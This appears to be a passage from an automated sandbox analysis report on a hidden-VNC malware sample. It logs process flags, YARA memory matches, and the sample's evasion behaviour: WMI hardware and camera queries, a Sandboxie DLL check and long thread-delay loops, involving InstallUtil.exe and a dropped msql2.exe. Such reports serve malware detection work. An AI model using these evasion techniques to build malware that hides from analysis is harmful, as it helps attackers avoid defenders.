Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: hvnc-CR-SCR-0710.bin.exe PID: 7164, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: msql2.exe PID: 2140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: msql2.exe PID: 5356, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory allocated: 1450000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory allocated: 2E50000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: DC0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 28D0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 48D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory allocated: D30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory allocated: 2A40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory allocated: 2850000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 14C0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2F80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2E80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory allocated: 1A30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory allocated: 34C0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: D30000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 29F0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2750000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599822
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599691
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599563
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599438
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599313
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599188
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599063
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598953
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598844
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598719
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598609
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598500
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598390
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598281
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598172
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598062
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597932
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597828
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597719
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597594
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597481
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597374
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599339
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597888
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597655
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597546
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597319
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598881
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598640
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598421
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598091
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597981
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597854
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597718
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597580
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Window / User API: threadDelayed 1372
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Window / User API: threadDelayed 3057
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7564
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2236
Source: C:\Users\user\AppData\Roaming\msql2.exe Window / User API: threadDelayed 1933
Source: C:\Users\user\AppData\Roaming\msql2.exe Window / User API: threadDelayed 2454
Source: C:\Users\user\AppData\Roaming\msql2.exe Window / User API: threadDelayed 1359
Source: C:\Users\user\AppData\Roaming\msql2.exe Window / User API: threadDelayed 2852
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2132 Thread sleep count: 1372 > 30
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599822s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2132 Thread sleep count: 3057 > 30
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599691s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599563s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599063s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598953s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598844s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598719s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598609s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598500s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598390s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598281s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598172s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598062s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597932s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597828s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597719s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597594s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597481s >= -30000s
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597374s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2800 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep count: 33 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -37000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3604 Thread sleep count: 7564 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3604 Thread sleep count: 2236 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36317s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36181s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36076s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35968s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35749s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35421s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35093s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34865s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34747s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34638s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34530s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34421s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34093s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32999s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32447s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32186s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -31934s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -31828s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 4428 Thread sleep count: 1933 > 30
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 4428 Thread sleep count: 2454 > 30
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599339s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598797s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598578s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598468s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598359s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598156s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597888s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597655s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597546s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597437s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597319s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6016 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 648 Thread sleep count: 1359 > 30
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 648 Thread sleep count: 2852 > 30
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598881s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598750s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598640s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598421s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598312s >= -30000s
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598203s >= -30000s
